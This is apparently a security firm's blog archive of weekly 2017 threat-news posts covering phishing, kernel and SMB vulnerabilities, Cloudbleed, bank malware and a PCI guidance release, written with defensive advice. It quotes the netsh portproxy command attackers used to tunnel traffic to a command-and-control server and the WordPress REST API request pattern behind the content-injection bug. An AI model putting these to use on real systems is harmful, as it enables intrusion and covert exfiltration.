Saturday, February 25, 2017

Cyber Updates - 25/02

Hey all,

Here are this week's cyber updates:

(1) A new phishing campaign, targeting Google Chrome's users, has been recently discovered.
The campaign encourages users to download a fake font, which in turn installs more than an innocent font, but rather a malware. Hackers have hacked into legitimate websites (for example by using the WordPress content injection vulnerability that was reported three weeks ago) in order to cause websites to display non-readable characters. The attackers then "offers" the user the ability to view the website's content by updating their "Chrome font package".



Once installed, the victim's machine is compromised. What interesting to note about the attack is that the font message looks legitimate (same UI as Chrome itself).

The following mistakes are done by this sophisticated attack:
1. The dialog window shows hard coded version of Chrome (version 53, instead of the currently installed version).
2. The image encourages users to download Chrome_font.exe, when in fact the downloaded file is Chrome Font v7.5.1.exe

Having said that, such mistakes can easily be fixed. Thus, users are requested not to install new fonts in case a website requests them to do so.

Here are all the details:
https://neosmart.net/blog/2017/beware-of-this-new-chrome-font-wasnt-found-hack/

(2) Linux Kernel was found to be vulnerable to yet another decade old privilege escalation exploit (CVE-2017-6074).
While the Dirty Cow exploit (dated back from 2007) was only discovered less than half a year ago, security researcher Andrey Konovalod has managed to discover an older exploit in Linux kernel (dated as far as 2005).
In particular, this vulnerability exploits a use-after-free in the DCCP protocol, which can allow an attacker to alter's the kernel memory.

Organizations are advised to update their kernel as soon as possible.

Here are all the details:
http://seclists.org/oss-sec/2017/q1/471
http://thehackernews.com/2017/02/linux-kernel-local-root.html

(3) A buffer overflow vulnerably in Cloudflare's edge servers was reported, allowing users to view sensitive information such as the authentication tokens (when stored in the server's memory). This vulnerability has resulted by a bad implementation of a Ragel script used for HTTP rewriting, causing the server to return more data than intended.
The data was already cached by search engines, therefore causing Cloudflare to wait for several days before publishing the details of this vulnerability.
While the leaked memory can contain private information, the SSL private key could not have been compromised by this bug.

Here are all the details:
https://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/

Stay tuned for more updates,

Dan Gurfinkel
Head of Offensive Security & Response Unit

Saturday, February 18, 2017

Cyber Updates - 18/02

Hey all,
Here are this week's cyber updates:

(1) Microsoft has not published its famous Patch Tuesday this month due to "a last minute issue that could impact some customers and was not resolved in time". This is presumably due to their difficulties in fixing the latest SMB v3 vulnerability that was reported in the last "cyber updates" post. This means that all Windows machines are still vulnerable to a server side remote code execution exploit.

Here are their details:
https://blogs.technet.microsoft.com/msrc/2017/02/14/february-2017-security-update-release/

(2) Yahoo was hacked. No, this is not the same hack as in 2013 that was recently published, but rather a new hacking attempt. 
Instead of stealing the (hashed) passwords, this time the attackers have used forged cookies in order to login to the victims' accounts without their consent. 

Here are all the details:
https://help.yahoo.com/kb/SLN27925.html?impressions=true

(3) Security researches have been able to prove that websites can track your online activity even if you use a different browser. The websites perform unique tasks in order to pinpoint the following metrics: time zone, number of CPU cores, GPU, hash values of GPU rendering results, plugins, fonts, audio, screen ratio and depth, WebGL, Ad blocking, canvas, cookies, encoding, and language. According to the research, the attackers were able to successfully identify 99.2% of the users.

Here are all the details:
http://thehackernews.com/2017/02/cross-browser-tracking.html

Stay tuned for more updates,



Dan Gurfinkel
Head of Offensive Security & Response Unit

Saturday, February 11, 2017

Cyber Updates - 11/02

Hey all,
Here are this week's cyber updates:

(1) Microsoft Office allows its users to add a macro script to be executed when the document is opened. While this is usually used for formulas calculation, attackers have used it to execute malicious code on their victims' workstations, and in particular infecting them with ransomware (such as the Locky ransomware).
Today, the first Word macro for Mac OS was discovered. The malware downloads another file from https://www.securitychecking.org/index.asp and decrypts it (the file is encrypted using RC4 encryption). The malware then executes the decrypted file.

Organizations that use Mac OS systems are requested to check if any machines has queried the following malicious DNS record: www.securitychecking.org



(2) Numerous worldwide banks have been targeted by a malware stored only in the server's memory. Kaspersky reported to have their incident response team called due to a meterpeter code found in the memory of a bank's domain controller
What's interesting about this attack is the fact that the attackers have used the netsh.exe utility (builtin tool) in order to tunnel traffic from the victim's host to the attacker's C&C servers. In particular, the following command was used:

netsh interface portproxy add v4tov4 listenport=4444 connectaddress=<IP> connectport=8080 listenaddress=0.0.0.0

This caused the infected machine to listen on port 4444 and send this traffic to <IP> in port 8080. 
Thus, this has allowed a legitimate tool (netsh.exe) to be used in order to allow internal workstations and computers to communicate with an external C&C server, even if a direct communication channel between the internal machines and the internet is blocked by the organization's firewall.

Here are some artifacts generated in the Windows registry that will quickly allow an organization to determine if one of their machines was infected:


  • HKLM\SYSTEM\ControlSet001\services\ – path will be modified after using the sc.exe utility
  • HKLM\SYSTEM\ControlSet001\services\PortProxy\v4tov4\tcp – path will be modified after using the netsh.exe utility

(3) This has not been the best week (in terms of cyber security) for banks. Numerous Polish banks have been hacked, and the interesting part is that the source of the attack came from KNF - the Polish authority in charge of the safety and security of banks in Poland. Apparently, someone hacked KNF's website and has modified a JavaScript file to contain malicious data.

Clients are advised to block access to the following hosts:
  • sap.misapor.ch
  • www.eye-watch.in
  • 125.214.195.17
  • 196.29.166.218



(4) Last week I've mentioned the ransomware that targeted an hotel in Austria; this week it was IHG's turn to be infected by a malware. About 12 InterContinental point of sales machines have been hacked, allowing the attackers to gain credit cards data.

The following link lists all infected properties: https://www.ihg.com/content/us/en/customer-care/protecting-our-guests. Be sure to check if you've purchased anything there!


(5) 76 famous iOS application are vulnerable to MiTM attacks. Some are very popular, such as Snapchat. The app is vulnerable to MiTM attacks, allowing attackers to still your credentials (username and password).


Stay tuned for more updates,
Dan Gurfinkel
Head of Offensive Security & Response Unit

Friday, February 3, 2017

Cyber Updates - 03/02

Hey all,
Here are this week’s cyber updates.

(1) Windows 8 & 10 are vulnerable to a server-side memory corruption vulnerability (CVE-2017-0016) in the SMB service. The vulnerability allows attackers to conduct a denial of service attack (BSOD) and possibly even execute code on the remote machine.
Currently, Microsoft has yet to issue a fix for this vulnerability, and an exploit for this vulnerability is reported to be seen in the wild.
Please  restrict SMB traffic in the FW until a patch is issued by Microsoft.

Here are all the details:


(2) Guests of the Romantik Seehotel Jaegerwirt hotel could not enter their rooms as their keycard was not working, and some guests’ reservations were gone from the system. Apparently, the computers running the electronic key lock were infected with a ransomware.

If you ask me, this just shows you the difference between a generic attack and a target-driven approach. The attackers could have easily collected all guests’ credit card details for years, allowing them to earn much more than the paid ransom (1,500 EUR).

In this case, the hotel had to pay the ransom ASAP, as any other alternative would have ended up in very unhappy guests. But, I guess they are already used to it, as the very same hotel was hacked three times before this incident.
Now you think that the hotel would want to protect its systems and prevent such an incident from reoccurring. Well, the hotel management found a rather “creative” solution – they are considering switching back to actual door keys and locks instead of key cards and electronic locks.

Here are all the details:

(3) WordPress just patched their environment against 0-day vulnerabilities. One of their bugs existed in their REST API, allowing remote privilege escalation as well as content injection. Basically speaking, the exploit has allowed any unauthenticated user to modify all pages.
In particular, by calling to /wp-json/wp/v2/posts/123?id=456ABC, WordPress attempts to check if the user has permissions to edit post id 456ABC, and if they don’t’ the function exits. Since such a post doesn’t’ exist (post ids should be numeric), the code then calls to update_item, which should have failed again. However, update_item casts the parameter to an int, causing the value to be changed to 456. Now a malicious unauthenticated user can update item 456 (which is a valid and existing post).

Here are all the details:

(4) Netgear routers have been found to contain 31 different vulnerabilities, including unauthenticated password disclosure. While by default the admin interface is not publicly accessible, this vulnerability can be used by internal attackers to infect routers, and possibly allow a malicious entity to own a big botnet for DDoS attacks. Alternatively, the attacker can conduct MiTM attacks. Think about it the next time you connect to a Starbucks Wi-Fi network.

Here are the details:

Stay tuned for more updates,
Dan Gurfinkel
Head of Offensive Security & Response Unit

Thursday, February 2, 2017

New Official PCI SSC Guidelines - “Best Practices for Securing E-commerce”

The new PCI SIG guidance, “Best Practices for Securing E-commerce”, was published several days ago.

The SIG (Special Interest Groups) is a formal PCI SSC professional program that allows QSAs, merchants, vendors and basically every member of the PCI community to work together and contribute on specific PCI areas, that require clarification or additional guidance.

The SIGs always contain valuable information and are one of the best ways to keep close to PCI SSC, anticipate trends and be few steps ahead of our clients

I have included here the new supplement and also the email sent by Troy Leach (PCI SSC’s CTO) received by myself amongst all of the SIG participants- to show the spirit and team effort that went into this one.

You can see that Comsec is credited and acknowledged as always for the valuable contribution inside the published document for our contribution and participation.

Nadav.

Nadav Shatz, PCI QSA  
Managing Director
T: +44 (0)203 463 8727 I M: +44 (0)7788 533 344